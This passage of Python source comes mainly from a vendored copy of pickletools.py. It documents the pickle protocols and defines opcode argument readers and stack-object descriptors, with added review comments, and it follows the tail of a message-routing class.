            for v in values():
                visit(v)
        visit(self.routing)
    def receive(self, msg):
        """
        Returns a (receiver, msg) pair, where receiver is `None` if no route for
        the message was found, or otherwise an object with a `receive` method
        that can accept that `msg`.

        Each step pops the first item off `msg` and descends one level of
        the routing table keyed by that item's value (as a string).
        NOTE(review): assumes `msg` supports ``popitem(last=False)``, i.e.
        is OrderedDict-like -- confirm against callers.
        """
        x = self.routing
        while not isinstance(x, ActionList):
            if not x or not msg:
                return None, msg
            if not isinstance(x, dict):
                raise ValueError('Unexpected type %s' % type(x))
            _, value = msg.popitem(last=False)
            x = x.get(str(value))
        return x, msg
    def __bool__(self):
        # An empty routing table is falsy.
        return bool(self.routing)
    def __str__(self):
        return str(self.routing)
| mit |
zhjunlang/kbengine | kbe/res/scripts/common/Lib/pickletools.py | 74 | 91170 | '''"Executable documentation" for the pickle module.
Extensive comments about the pickle protocols and pickle-machine opcodes
can be found here. Some functions meant for external use:
genops(pickle)
Generate all the opcodes in a pickle, as (opcode, arg, position) triples.
dis(pickle, out=None, memo=None, indentlevel=4)
Print a symbolic disassembly of a pickle.
'''
import codecs
import io
import pickle
import re
import sys
# Public API of this module; everything else is implementation detail.
__all__ = ['dis', 'genops', 'optimize']
# Alias of pickle's internal tuple of bytes-like types.
bytes_types = pickle.bytes_types
# Other ideas:
#
# - A pickle verifier: read a pickle and check it exhaustively for
# well-formedness. dis() does a lot of this already.
#
# - A protocol identifier: examine a pickle and return its protocol number
# (== the highest .proto attr value among all the opcodes in the pickle).
# dis() already prints this info at the end.
#
# - A pickle optimizer: for example, tuple-building code is sometimes more
# elaborate than necessary, catering for the possibility that the tuple
# is recursive. Or lots of times a PUT is generated that's never accessed
# by a later GET.
# "A pickle" is a program for a virtual pickle machine (PM, but more accurately
# called an unpickling machine). It's a sequence of opcodes, interpreted by the
# PM, building an arbitrarily complex Python object.
#
# For the most part, the PM is very simple: there are no looping, testing, or
# conditional instructions, no arithmetic and no function calls. Opcodes are
# executed once each, from first to last, until a STOP opcode is reached.
#
# The PM has two data areas, "the stack" and "the memo".
#
# Many opcodes push Python objects onto the stack; e.g., INT pushes a Python
# integer object on the stack, whose value is gotten from a decimal string
# literal immediately following the INT opcode in the pickle bytestream. Other
# opcodes take Python objects off the stack. The result of unpickling is
# whatever object is left on the stack when the final STOP opcode is executed.
#
# The memo is simply an array of objects, or it can be implemented as a dict
# mapping little integers to objects. The memo serves as the PM's "long term
# memory", and the little integers indexing the memo are akin to variable
# names. Some opcodes pop a stack object into the memo at a given index,
# and others push a memo object at a given index onto the stack again.
#
# At heart, that's all the PM has. Subtleties arise for these reasons:
#
# + Object identity. Objects can be arbitrarily complex, and subobjects
# may be shared (for example, the list [a, a] refers to the same object a
# twice). It can be vital that unpickling recreate an isomorphic object
# graph, faithfully reproducing sharing.
#
# + Recursive objects. For example, after "L = []; L.append(L)", L is a
# list, and L[0] is the same list. This is related to the object identity
# point, and some sequences of pickle opcodes are subtle in order to
# get the right result in all cases.
#
# + Things pickle doesn't know everything about. Examples of things pickle
# does know everything about are Python's builtin scalar and container
# types, like ints and tuples. They generally have opcodes dedicated to
# them. For things like module references and instances of user-defined
# classes, pickle's knowledge is limited. Historically, many enhancements
# have been made to the pickle protocol in order to do a better (faster,
# and/or more compact) job on those.
#
# + Backward compatibility and micro-optimization. As explained below,
# pickle opcodes never go away, not even when better ways to do a thing
# get invented. The repertoire of the PM just keeps growing over time.
# For example, protocol 0 had two opcodes for building Python integers (INT
# and LONG), protocol 1 added three more for more-efficient pickling of short
# integers, and protocol 2 added two more for more-efficient pickling of
# long integers (before protocol 2, the only ways to pickle a Python long
# took time quadratic in the number of digits, for both pickling and
# unpickling). "Opcode bloat" isn't so much a subtlety as a source of
# wearying complication.
#
#
# Pickle protocols:
#
# For compatibility, the meaning of a pickle opcode never changes. Instead new
# pickle opcodes get added, and each version's unpickler can handle all the
# pickle opcodes in all protocol versions to date. So old pickles continue to
# be readable forever. The pickler can generally be told to restrict itself to
# the subset of opcodes available under previous protocol versions too, so that
# users can create pickles under the current version readable by older
# versions. However, a pickle does not contain its version number embedded
# within it. If an older unpickler tries to read a pickle using a later
# protocol, the result is most likely an exception due to seeing an unknown (in
# the older unpickler) opcode.
#
# The original pickle used what's now called "protocol 0", and what was called
# "text mode" before Python 2.3. The entire pickle bytestream is made up of
# printable 7-bit ASCII characters, plus the newline character, in protocol 0.
# That's why it was called text mode. Protocol 0 is small and elegant, but
# sometimes painfully inefficient.
#
# The second major set of additions is now called "protocol 1", and was called
# "binary mode" before Python 2.3. This added many opcodes with arguments
# consisting of arbitrary bytes, including NUL bytes and unprintable "high bit"
# bytes. Binary mode pickles can be substantially smaller than equivalent
# text mode pickles, and sometimes faster too; e.g., BININT represents a 4-byte
# int as 4 bytes following the opcode, which is cheaper to unpickle than the
# (perhaps) 11-character decimal string attached to INT. Protocol 1 also added
# a number of opcodes that operate on many stack elements at once (like APPENDS
# and SETITEMS), and "shortcut" opcodes (like EMPTY_DICT and EMPTY_TUPLE).
#
# The third major set of additions came in Python 2.3, and is called "protocol
# 2". This added:
#
# - A better way to pickle instances of new-style classes (NEWOBJ).
#
# - A way for a pickle to identify its protocol (PROTO).
#
# - Time- and space- efficient pickling of long ints (LONG{1,4}).
#
# - Shortcuts for small tuples (TUPLE{1,2,3}}.
#
# - Dedicated opcodes for bools (NEWTRUE, NEWFALSE).
#
# - The "extension registry", a vector of popular objects that can be pushed
# efficiently by index (EXT{1,2,4}). This is akin to the memo and GET, but
# the registry contents are predefined (there's nothing akin to the memo's
# PUT).
#
# Another independent change with Python 2.3 is the abandonment of any
# pretense that it might be safe to load pickles received from untrusted
# parties -- no sufficient security analysis has been done to guarantee
# this and there isn't a use case that warrants the expense of such an
# analysis.
#
# To this end, all tests for __safe_for_unpickling__ or for
# copyreg.safe_constructors are removed from the unpickling code.
# References to these variables in the descriptions below are to be seen
# as describing unpickling in Python 2.2 and before.
# Meta-rule: Descriptions are stored in instances of descriptor objects,
# with plain constructors. No meta-language is defined from which
# descriptors could be constructed. If you want, e.g., XML, write a little
# program to generate XML from the objects.
##############################################################################
# Some pickle opcodes have an argument, following the opcode in the
# bytestream. An argument is of a specific type, described by an instance
# of ArgumentDescriptor. These are not to be confused with arguments taken
# off the stack -- ArgumentDescriptor applies only to arguments embedded in
# the opcode stream, immediately following an opcode.
# Represents the number of bytes consumed by an argument delimited by the
# next newline character.
UP_TO_NEWLINE = -1
# Represents the number of bytes consumed by a two-argument opcode where
# the first argument gives the number of bytes in the second argument.
# These sentinels are negative so they cannot collide with real byte counts.
TAKEN_FROM_ARGUMENT1 = -2   # num bytes is 1-byte unsigned int
TAKEN_FROM_ARGUMENT4 = -3   # num bytes is 4-byte signed little-endian int
TAKEN_FROM_ARGUMENT4U = -4  # num bytes is 4-byte unsigned little-endian int
TAKEN_FROM_ARGUMENT8U = -5  # num bytes is 8-byte unsigned little-endian int
class ArgumentDescriptor(object):
    """Describes one in-stream argument of a pickle opcode."""

    __slots__ = (
        # name of descriptor record, also a module global name; a string
        'name',

        # length of argument, in bytes; an int; UP_TO_NEWLINE and
        # TAKEN_FROM_ARGUMENT{1,4,8} are negative values for variable-length
        # cases
        'n',

        # a function taking a file-like object, reading this kind of argument
        # from the object at the current position, advancing the current
        # position by n bytes, and returning the value of the argument
        'reader',

        # human-readable docs for this arg descriptor; a string
        'doc',
    )

    def __init__(self, name, n, reader, doc):
        assert isinstance(name, str)
        self.name = name

        # n is either a non-negative fixed length or one of the
        # variable-length sentinels defined above.
        sentinels = (UP_TO_NEWLINE,
                     TAKEN_FROM_ARGUMENT1,
                     TAKEN_FROM_ARGUMENT4,
                     TAKEN_FROM_ARGUMENT4U,
                     TAKEN_FROM_ARGUMENT8U)
        assert isinstance(n, int) and (n >= 0 or n in sentinels)
        self.n = n

        self.reader = reader

        assert isinstance(doc, str)
        self.doc = doc
from struct import unpack as _unpack
def read_uint1(f):
    r"""Read an unsigned 1-byte integer from file-like object *f*.

    >>> import io
    >>> read_uint1(io.BytesIO(b'\xff'))
    255
    """
    data = f.read(1)
    if not data:
        raise ValueError("not enough data in stream to read uint1")
    return data[0]

uint1 = ArgumentDescriptor(
    name='uint1',
    n=1,
    reader=read_uint1,
    doc="One-byte unsigned integer.")
def read_uint2(f):
    r"""Read a little-endian unsigned 2-byte integer from *f*.

    >>> import io
    >>> read_uint2(io.BytesIO(b'\xff\x00'))
    255
    >>> read_uint2(io.BytesIO(b'\xff\xff'))
    65535
    """
    data = f.read(2)
    if len(data) < 2:
        raise ValueError("not enough data in stream to read uint2")
    return _unpack("<H", data)[0]

uint2 = ArgumentDescriptor(
    name='uint2',
    n=2,
    reader=read_uint2,
    doc="Two-byte unsigned integer, little-endian.")
def read_int4(f):
    r"""Read a little-endian signed 4-byte integer from *f*.

    >>> import io
    >>> read_int4(io.BytesIO(b'\xff\x00\x00\x00'))
    255
    >>> read_int4(io.BytesIO(b'\x00\x00\x00\x80')) == -(2**31)
    True
    """
    data = f.read(4)
    if len(data) < 4:
        raise ValueError("not enough data in stream to read int4")
    return _unpack("<i", data)[0]

int4 = ArgumentDescriptor(
    name='int4',
    n=4,
    reader=read_int4,
    doc="Four-byte signed integer, little-endian, 2's complement.")
def read_uint4(f):
    r"""Read a little-endian unsigned 4-byte integer from *f*.

    >>> import io
    >>> read_uint4(io.BytesIO(b'\xff\x00\x00\x00'))
    255
    >>> read_uint4(io.BytesIO(b'\x00\x00\x00\x80')) == 2**31
    True
    """
    data = f.read(4)
    if len(data) < 4:
        raise ValueError("not enough data in stream to read uint4")
    return _unpack("<I", data)[0]

uint4 = ArgumentDescriptor(
    name='uint4',
    n=4,
    reader=read_uint4,
    doc="Four-byte unsigned integer, little-endian.")
def read_uint8(f):
    r"""Read a little-endian unsigned 8-byte integer from *f*.

    >>> import io
    >>> read_uint8(io.BytesIO(b'\xff\x00\x00\x00\x00\x00\x00\x00'))
    255
    >>> read_uint8(io.BytesIO(b'\xff' * 8)) == 2**64-1
    True
    """
    data = f.read(8)
    if len(data) < 8:
        raise ValueError("not enough data in stream to read uint8")
    return _unpack("<Q", data)[0]

uint8 = ArgumentDescriptor(
    name='uint8',
    n=8,
    reader=read_uint8,
    doc="Eight-byte unsigned integer, little-endian.")
def read_stringnl(f, decode=True, stripquotes=True):
    r"""
    Read a newline-terminated, repr-style string from *f*.

    >>> import io
    >>> read_stringnl(io.BytesIO(b"'abcd'\nefg\n"))
    'abcd'

    >>> read_stringnl(io.BytesIO(b"\n"))
    Traceback (most recent call last):
    ...
    ValueError: no string quotes around b''

    >>> read_stringnl(io.BytesIO(b"\n"), stripquotes=False)
    ''

    >>> read_stringnl(io.BytesIO(b"''\n"))
    ''

    >>> read_stringnl(io.BytesIO(b'"abcd"'))
    Traceback (most recent call last):
    ...
    ValueError: no newline found when trying to read stringnl

    Embedded escapes are undone in the result.
    >>> read_stringnl(io.BytesIO(br"'a\n\\b\x00c\td'" + b"\n'e'"))
    'a\n\\b\x00c\td'
    """
    data = f.readline()
    if not data.endswith(b'\n'):
        raise ValueError("no newline found when trying to read stringnl")
    data = data[:-1]    # lose the newline

    if stripquotes:
        for q in (b'"', b"'"):
            if data.startswith(q):
                if not data.endswith(q):
                    # Fixed typo in the error message ("strinq" -> "string").
                    raise ValueError("string quote %r not found at both "
                                     "ends of %r" % (q, data))
                data = data[1:-1]
                break
        else:
            raise ValueError("no string quotes around %r" % data)

    if decode:
        # Undo repr-style escapes and decode to str (ASCII only).
        data = codecs.escape_decode(data)[0].decode("ascii")
    return data

stringnl = ArgumentDescriptor(
    name='stringnl',
    n=UP_TO_NEWLINE,
    reader=read_stringnl,
    doc="""A newline-terminated string.

           This is a repr-style string, with embedded escapes, and
           bracketing quotes.
           """)
def read_stringnl_noescape(f):
    """Read a newline-terminated string with no quotes and no escapes."""
    return read_stringnl(f, decode=True, stripquotes=False)

stringnl_noescape = ArgumentDescriptor(
    name='stringnl_noescape',
    n=UP_TO_NEWLINE,
    reader=read_stringnl_noescape,
    doc="""A newline-terminated string.

           This is a str-style string, without embedded escapes,
           or bracketing quotes.  It should consist solely of
           printable ASCII characters.
           """)
def read_stringnl_noescape_pair(f):
    r"""
    Read two consecutive plain newline-terminated strings and join them
    with a single blank.

    >>> import io
    >>> read_stringnl_noescape_pair(io.BytesIO(b"Queue\nEmpty\njunk"))
    'Queue Empty'
    """
    first = read_stringnl_noescape(f)
    second = read_stringnl_noescape(f)
    return "%s %s" % (first, second)

stringnl_noescape_pair = ArgumentDescriptor(
    name='stringnl_noescape_pair',
    n=UP_TO_NEWLINE,
    reader=read_stringnl_noescape_pair,
    doc="""A pair of newline-terminated strings.

           These are str-style strings, without embedded
           escapes, or bracketing quotes.  They should
           consist solely of printable ASCII characters.
           The pair is returned as a single string, with
           a single blank separating the two strings.
           """)
def read_string1(f):
    r"""
    >>> import io
    >>> read_string1(io.BytesIO(b"\x00"))
    ''
    >>> read_string1(io.BytesIO(b"\x03abcdef"))
    'abc'
    """
    n = read_uint1(f)
    assert n >= 0
    data = f.read(n)
    if len(data) < n:
        raise ValueError("expected %d bytes in a string1, but only %d remain" %
                         (n, len(data)))
    # Protocol 1 strings carry raw bytes; latin-1 maps them 1:1 to str.
    return data.decode("latin-1")

string1 = ArgumentDescriptor(
    name="string1",
    n=TAKEN_FROM_ARGUMENT1,
    reader=read_string1,
    doc="""A counted string.

           The first argument is a 1-byte unsigned int giving the number
           of bytes in the string, and the second argument is that many
           bytes.
           """)
def read_string4(f):
    r"""
    >>> import io
    >>> read_string4(io.BytesIO(b"\x00\x00\x00\x00abc"))
    ''
    >>> read_string4(io.BytesIO(b"\x03\x00\x00\x00abcdef"))
    'abc'
    >>> read_string4(io.BytesIO(b"\x00\x00\x00\x03abcdef"))
    Traceback (most recent call last):
    ...
    ValueError: expected 50331648 bytes in a string4, but only 6 remain
    """
    n = read_int4(f)
    # The count is a *signed* 4-byte int; reject negative lengths.
    if n < 0:
        raise ValueError("string4 byte count < 0: %d" % n)
    data = f.read(n)
    if len(data) < n:
        raise ValueError("expected %d bytes in a string4, but only %d remain" %
                         (n, len(data)))
    return data.decode("latin-1")

string4 = ArgumentDescriptor(
    name="string4",
    n=TAKEN_FROM_ARGUMENT4,
    reader=read_string4,
    doc="""A counted string.

           The first argument is a 4-byte little-endian signed int giving
           the number of bytes in the string, and the second argument is
           that many bytes.
           """)
def read_bytes1(f):
    r"""
    Read a 1-byte length prefix, then that many bytes, and return them.

    NOTE(review): this function and the `bytes1` descriptor below are
    immediately shadowed by identical duplicate definitions later in this
    module; only the later definitions are effective at runtime.  One of
    the two copies should eventually be removed.

    >>> import io
    >>> read_bytes1(io.BytesIO(b"\x00"))
    b''
    >>> read_bytes1(io.BytesIO(b"\x03abcdef"))
    b'abc'
    """
    n = read_uint1(f)
    assert n >= 0
    data = f.read(n)
    if len(data) == n:
        return data
    raise ValueError("expected %d bytes in a bytes1, but only %d remain" %
                     (n, len(data)))

bytes1 = ArgumentDescriptor(
    name="bytes1",
    n=TAKEN_FROM_ARGUMENT1,
    reader=read_bytes1,
    doc="""A counted bytes string.

           The first argument is a 1-byte unsigned int giving the number
           of bytes in the string, and the second argument is that many
           bytes.
           """)
def read_bytes1(f):
    r"""
    >>> import io
    >>> read_bytes1(io.BytesIO(b"\x00"))
    b''
    >>> read_bytes1(io.BytesIO(b"\x03abcdef"))
    b'abc'
    """
    n = read_uint1(f)
    assert n >= 0
    data = f.read(n)
    if len(data) < n:
        raise ValueError("expected %d bytes in a bytes1, but only %d remain" %
                         (n, len(data)))
    return data

bytes1 = ArgumentDescriptor(
    name="bytes1",
    n=TAKEN_FROM_ARGUMENT1,
    reader=read_bytes1,
    doc="""A counted bytes string.

           The first argument is a 1-byte unsigned int giving the number
           of bytes, and the second argument is that many bytes.
           """)
def read_bytes4(f):
    r"""
    >>> import io
    >>> read_bytes4(io.BytesIO(b"\x00\x00\x00\x00abc"))
    b''
    >>> read_bytes4(io.BytesIO(b"\x03\x00\x00\x00abcdef"))
    b'abc'
    >>> read_bytes4(io.BytesIO(b"\x00\x00\x00\x03abcdef"))
    Traceback (most recent call last):
    ...
    ValueError: expected 50331648 bytes in a bytes4, but only 6 remain
    """
    n = read_uint4(f)
    assert n >= 0
    # Guard against absurd counts that cannot fit in memory on this box.
    if n > sys.maxsize:
        raise ValueError("bytes4 byte count > sys.maxsize: %d" % n)
    data = f.read(n)
    if len(data) < n:
        raise ValueError("expected %d bytes in a bytes4, but only %d remain" %
                         (n, len(data)))
    return data

bytes4 = ArgumentDescriptor(
    name="bytes4",
    n=TAKEN_FROM_ARGUMENT4U,
    reader=read_bytes4,
    doc="""A counted bytes string.

           The first argument is a 4-byte little-endian unsigned int giving
           the number of bytes, and the second argument is that many bytes.
           """)
def read_bytes8(f):
    r"""
    >>> import io, struct, sys
    >>> read_bytes8(io.BytesIO(b"\x00\x00\x00\x00\x00\x00\x00\x00abc"))
    b''
    >>> read_bytes8(io.BytesIO(b"\x03\x00\x00\x00\x00\x00\x00\x00abcdef"))
    b'abc'
    >>> bigsize8 = struct.pack("<Q", sys.maxsize//3)
    >>> read_bytes8(io.BytesIO(bigsize8 + b"abcdef")) #doctest: +ELLIPSIS
    Traceback (most recent call last):
    ...
    ValueError: expected ... bytes in a bytes8, but only 6 remain
    """
    n = read_uint8(f)
    assert n >= 0
    # A 64-bit count can exceed what this platform can address; reject it.
    if n > sys.maxsize:
        raise ValueError("bytes8 byte count > sys.maxsize: %d" % n)
    data = f.read(n)
    if len(data) < n:
        raise ValueError("expected %d bytes in a bytes8, but only %d remain" %
                         (n, len(data)))
    return data

bytes8 = ArgumentDescriptor(
    name="bytes8",
    n=TAKEN_FROM_ARGUMENT8U,
    reader=read_bytes8,
    doc="""A counted bytes string.

           The first argument is a 8-byte little-endian unsigned int giving
           the number of bytes, and the second argument is that many bytes.
           """)
def read_unicodestringnl(f):
    r"""
    >>> import io
    >>> read_unicodestringnl(io.BytesIO(b"abc\\uabcd\njunk")) == 'abc\uabcd'
    True
    """
    line = f.readline()
    if not line.endswith(b'\n'):
        raise ValueError("no newline found when trying to read "
                         "unicodestringnl")
    # Drop the newline, then decode the raw-unicode-escape payload.
    return str(line[:-1], 'raw-unicode-escape')

unicodestringnl = ArgumentDescriptor(
    name='unicodestringnl',
    n=UP_TO_NEWLINE,
    reader=read_unicodestringnl,
    doc="""A newline-terminated Unicode string.

           This is raw-unicode-escape encoded, so consists of
           printable ASCII characters, and may contain embedded
           escape sequences.
           """)
def read_unicodestring1(f):
    r"""
    >>> import io
    >>> s = 'abcd\uabcd'
    >>> enc = s.encode('utf-8')
    >>> enc
    b'abcd\xea\xaf\x8d'
    >>> n = bytes([len(enc)])  # little-endian 1-byte length
    >>> t = read_unicodestring1(io.BytesIO(n + enc + b'junk'))
    >>> s == t
    True

    >>> read_unicodestring1(io.BytesIO(n + enc[:-1]))
    Traceback (most recent call last):
    ...
    ValueError: expected 7 bytes in a unicodestring1, but only 6 remain
    """
    n = read_uint1(f)
    assert n >= 0
    data = f.read(n)
    if len(data) == n:
        # surrogatepass round-trips lone surrogates written by the pickler.
        return str(data, 'utf-8', 'surrogatepass')
    raise ValueError("expected %d bytes in a unicodestring1, but only %d "
                     "remain" % (n, len(data)))

unicodestring1 = ArgumentDescriptor(
    name="unicodestring1",
    n=TAKEN_FROM_ARGUMENT1,
    reader=read_unicodestring1,
    doc="""A counted Unicode string.

           The first argument is a 1-byte unsigned int
           giving the number of bytes in the string, and the second
           argument-- the UTF-8 encoding of the Unicode string --
           contains that many bytes.
           """)
# Doc fix: the length prefix is read with read_uint1, so it is unsigned
# (the old text said "1-byte little-endian signed int").
def read_unicodestring4(f):
    r"""
    >>> import io
    >>> s = 'abcd\uabcd'
    >>> enc = s.encode('utf-8')
    >>> enc
    b'abcd\xea\xaf\x8d'
    >>> n = bytes([len(enc), 0, 0, 0])  # little-endian 4-byte length
    >>> t = read_unicodestring4(io.BytesIO(n + enc + b'junk'))
    >>> s == t
    True

    >>> read_unicodestring4(io.BytesIO(n + enc[:-1]))
    Traceback (most recent call last):
    ...
    ValueError: expected 7 bytes in a unicodestring4, but only 6 remain
    """
    n = read_uint4(f)
    assert n >= 0
    if n > sys.maxsize:
        raise ValueError("unicodestring4 byte count > sys.maxsize: %d" % n)
    data = f.read(n)
    if len(data) == n:
        # surrogatepass round-trips lone surrogates written by the pickler.
        return str(data, 'utf-8', 'surrogatepass')
    raise ValueError("expected %d bytes in a unicodestring4, but only %d "
                     "remain" % (n, len(data)))

unicodestring4 = ArgumentDescriptor(
    name="unicodestring4",
    n=TAKEN_FROM_ARGUMENT4U,
    reader=read_unicodestring4,
    doc="""A counted Unicode string.

           The first argument is a 4-byte little-endian unsigned int
           giving the number of bytes in the string, and the second
           argument-- the UTF-8 encoding of the Unicode string --
           contains that many bytes.
           """)
# Doc fix: the length prefix is read with read_uint4 (and the descriptor is
# tagged TAKEN_FROM_ARGUMENT4U), so it is unsigned, not signed.
def read_unicodestring8(f):
    r"""
    >>> import io
    >>> s = 'abcd\uabcd'
    >>> enc = s.encode('utf-8')
    >>> enc
    b'abcd\xea\xaf\x8d'
    >>> n = bytes([len(enc)]) + bytes(7)  # little-endian 8-byte length
    >>> t = read_unicodestring8(io.BytesIO(n + enc + b'junk'))
    >>> s == t
    True

    >>> read_unicodestring8(io.BytesIO(n + enc[:-1]))
    Traceback (most recent call last):
    ...
    ValueError: expected 7 bytes in a unicodestring8, but only 6 remain
    """
    n = read_uint8(f)
    assert n >= 0
    if n > sys.maxsize:
        raise ValueError("unicodestring8 byte count > sys.maxsize: %d" % n)
    data = f.read(n)
    if len(data) == n:
        # surrogatepass round-trips lone surrogates written by the pickler.
        return str(data, 'utf-8', 'surrogatepass')
    raise ValueError("expected %d bytes in a unicodestring8, but only %d "
                     "remain" % (n, len(data)))

unicodestring8 = ArgumentDescriptor(
    name="unicodestring8",
    n=TAKEN_FROM_ARGUMENT8U,
    reader=read_unicodestring8,
    doc="""A counted Unicode string.

           The first argument is an 8-byte little-endian unsigned int
           giving the number of bytes in the string, and the second
           argument-- the UTF-8 encoding of the Unicode string --
           contains that many bytes.
           """)
# Doc fix: the length prefix is read with read_uint8 (descriptor tagged
# TAKEN_FROM_ARGUMENT8U), so it is unsigned, not signed.
def read_decimalnl_short(f):
    r"""
    >>> import io
    >>> read_decimalnl_short(io.BytesIO(b"1234\n56"))
    1234

    >>> read_decimalnl_short(io.BytesIO(b"1234L\n56"))
    Traceback (most recent call last):
    ...
    ValueError: invalid literal for int() with base 10: b'1234L'
    """
    s = read_stringnl(f, decode=False, stripquotes=False)

    # Protocol 0 hack: booleans are pickled as the literals "00" and "01".
    if s == b"00":
        return False
    if s == b"01":
        return True
    return int(s)

def read_decimalnl_long(f):
    r"""
    >>> import io
    >>> read_decimalnl_long(io.BytesIO(b"1234L\n56"))
    1234

    >>> read_decimalnl_long(io.BytesIO(b"123456789012345678901234L\n6"))
    123456789012345678901234
    """
    s = read_stringnl(f, decode=False, stripquotes=False)
    # Strip the Python-2-era trailing 'L' before converting.
    if s.endswith(b'L'):
        s = s[:-1]
    return int(s)

decimalnl_short = ArgumentDescriptor(
    name='decimalnl_short',
    n=UP_TO_NEWLINE,
    reader=read_decimalnl_short,
    doc="""A newline-terminated decimal integer literal.

           This never has a trailing 'L', and the integer fit
           in a short Python int on the box where the pickle
           was written -- but there's no guarantee it will fit
           in a short Python int on the box where the pickle
           is read.
           """)

decimalnl_long = ArgumentDescriptor(
    name='decimalnl_long',
    n=UP_TO_NEWLINE,
    reader=read_decimalnl_long,
    doc="""A newline-terminated decimal integer literal.

           This has a trailing 'L', and can represent integers
           of any size.
           """)
def read_floatnl(f):
    r"""
    >>> import io
    >>> read_floatnl(io.BytesIO(b"-1.25\n6"))
    -1.25
    """
    literal = read_stringnl(f, decode=False, stripquotes=False)
    return float(literal)

floatnl = ArgumentDescriptor(
    name='floatnl',
    n=UP_TO_NEWLINE,
    reader=read_floatnl,
    doc="""A newline-terminated decimal floating literal.

           In general this requires 17 significant digits for roundtrip
           identity, and pickling then unpickling infinities, NaNs, and
           minus zero doesn't work across boxes, or on some boxes even
           on itself (e.g., Windows can't read the strings it produces
           for infinities or NaNs).
           """)
def read_float8(f):
    r"""
    >>> import io, struct
    >>> raw = struct.pack(">d", -1.25)
    >>> raw
    b'\xbf\xf4\x00\x00\x00\x00\x00\x00'
    >>> read_float8(io.BytesIO(raw + b"\n"))
    -1.25
    """
    data = f.read(8)
    if len(data) < 8:
        raise ValueError("not enough data in stream to read float8")
    # Big-endian IEEE-754 double, same layout as struct format '>d'.
    return _unpack(">d", data)[0]

float8 = ArgumentDescriptor(
    name='float8',
    n=8,
    reader=read_float8,
    doc="""An 8-byte binary representation of a float, big-endian.

           The format is unique to Python, and shared with the struct
           module (format string '>d') "in theory" (the struct and pickle
           implementations don't share the code -- they should).  It's
           strongly related to the IEEE-754 double format, and, in normal
           cases, is in fact identical to the big-endian 754 double format.
           On other boxes the dynamic range is limited to that of a 754
           double, and "add a half and chop" rounding is used to reduce
           the precision to 53 bits.  However, even on a 754 box,
           infinities, NaNs, and minus zero may not be handled correctly
           (may not survive roundtrip pickling intact).
           """)
# Protocol 2 formats
from pickle import decode_long
def read_long1(f):
    r"""
    >>> import io
    >>> read_long1(io.BytesIO(b"\x00"))
    0
    >>> read_long1(io.BytesIO(b"\x02\xff\x00"))
    255
    >>> read_long1(io.BytesIO(b"\x02\xff\x7f"))
    32767
    >>> read_long1(io.BytesIO(b"\x02\x00\xff"))
    -256
    >>> read_long1(io.BytesIO(b"\x02\x00\x80"))
    -32768
    """
    n = read_uint1(f)
    data = f.read(n)
    if len(data) < n:
        raise ValueError("not enough data in stream to read long1")
    # Little-endian two's-complement, decoded by pickle's own helper.
    return decode_long(data)

long1 = ArgumentDescriptor(
    name="long1",
    n=TAKEN_FROM_ARGUMENT1,
    reader=read_long1,
    doc="""A binary long, little-endian, using 1-byte size.

           This first reads one byte as an unsigned size, then reads that
           many bytes and interprets them as a little-endian 2's-complement long.
           If the size is 0, that's taken as a shortcut for the long 0L.
           """)
def read_long4(f):
    r"""Read a LONG4 argument: a 4-byte signed length prefix followed by
    that many bytes of little-endian 2's-complement long.

    Raises ValueError if the length is negative or the stream is truncated.

    >>> import io
    >>> read_long4(io.BytesIO(b"\x02\x00\x00\x00\xff\x00"))
    255
    >>> read_long4(io.BytesIO(b"\x02\x00\x00\x00\xff\x7f"))
    32767
    >>> read_long4(io.BytesIO(b"\x02\x00\x00\x00\x00\xff"))
    -256
    >>> read_long4(io.BytesIO(b"\x02\x00\x00\x00\x00\x80"))
    -32768
    >>> read_long4(io.BytesIO(b"\x00\x00\x00\x00"))
    0
    """
    # BUGFIX: the final doctest above called read_long1, not read_long4
    # (it only passed by coincidence, since both return 0 for that input).
    n = read_int4(f)
    # The size is read as a *signed* int4; reject negative counts explicitly.
    if n < 0:
        raise ValueError("long4 byte count < 0: %d" % n)
    data = f.read(n)
    if len(data) != n:
        raise ValueError("not enough data in stream to read long4")
    return decode_long(data)
long4 = ArgumentDescriptor(
name="long4",
n=TAKEN_FROM_ARGUMENT4,
reader=read_long4,
doc="""A binary representation of a long, little-endian.
This first reads four bytes as a signed size (but requires the
size to be >= 0), then reads that many bytes and interprets them
as a little-endian 2's-complement long. If the size is 0, that's taken
as a shortcut for the int 0, although LONG1 should really be used
then instead (and in any case where # of bytes < 256).
""")
##############################################################################
# Object descriptors. The stack used by the pickle machine holds objects,
# and in the stack_before and stack_after attributes of OpcodeInfo
# descriptors we need names to describe the various types of objects that can
# appear on the stack.
class StackObject(object):
    """Descriptor for one kind of object the pickle machine's stack can hold.

    Used by OpcodeInfo's stack_before/stack_after attributes to name the
    types of values each opcode consumes and produces.
    """

    __slots__ = (
        'name',    # descriptor record name, for info only
        'obtype',  # a type, or a tuple of types the object may belong to
        'doc',     # human-readable description; a string
    )

    def __init__(self, name, obtype, doc):
        # Validate and store each field in turn, mirroring the declaration
        # order of __slots__.
        assert isinstance(name, str)
        self.name = name

        assert isinstance(obtype, type) or isinstance(obtype, tuple)
        if isinstance(obtype, tuple):
            for member in obtype:
                assert isinstance(member, type)
        self.obtype = obtype

        assert isinstance(doc, str)
        self.doc = doc

    def __repr__(self):
        # The short name alone reads best in disassembly output.
        return self.name
# Concrete StackObject instances, one per kind of value the pickle machine
# can push.  pyint/pylong and pybytes_or_str/pystring are aliases kept for
# backward compatibility with older names.
pyint = pylong = StackObject(
    name='int',
    obtype=int,
    doc="A Python integer object.")
pyinteger_or_bool = StackObject(
    name='int_or_bool',
    obtype=(int, bool),
    doc="A Python integer or boolean object.")
pybool = StackObject(
    name='bool',
    obtype=bool,
    doc="A Python boolean object.")
pyfloat = StackObject(
    name='float',
    obtype=float,
    doc="A Python float object.")
pybytes_or_str = pystring = StackObject(
    name='bytes_or_str',
    obtype=(bytes, str),
    doc="A Python bytes or (Unicode) string object.")
pybytes = StackObject(
    name='bytes',
    obtype=bytes,
    doc="A Python bytes object.")
pyunicode = StackObject(
    name='str',
    obtype=str,
    doc="A Python (Unicode) string object.")
pynone = StackObject(
    name="None",
    obtype=type(None),
    doc="The Python None object.")
pytuple = StackObject(
    name="tuple",
    obtype=tuple,
    doc="A Python tuple object.")
pylist = StackObject(
    name="list",
    obtype=list,
    doc="A Python list object.")
pydict = StackObject(
    name="dict",
    obtype=dict,
    doc="A Python dict object.")
pyset = StackObject(
    name="set",
    obtype=set,
    doc="A Python set object.")
# BUGFIX: obtype was `set`, but frozenset is not a subclass of set, so a
# frozenset on the stack is not an instance of the declared obtype.  This
# contradicts StackObject's own contract ("type of object ... the object
# can be of any type in the tuple").
pyfrozenset = StackObject(
    name="frozenset",
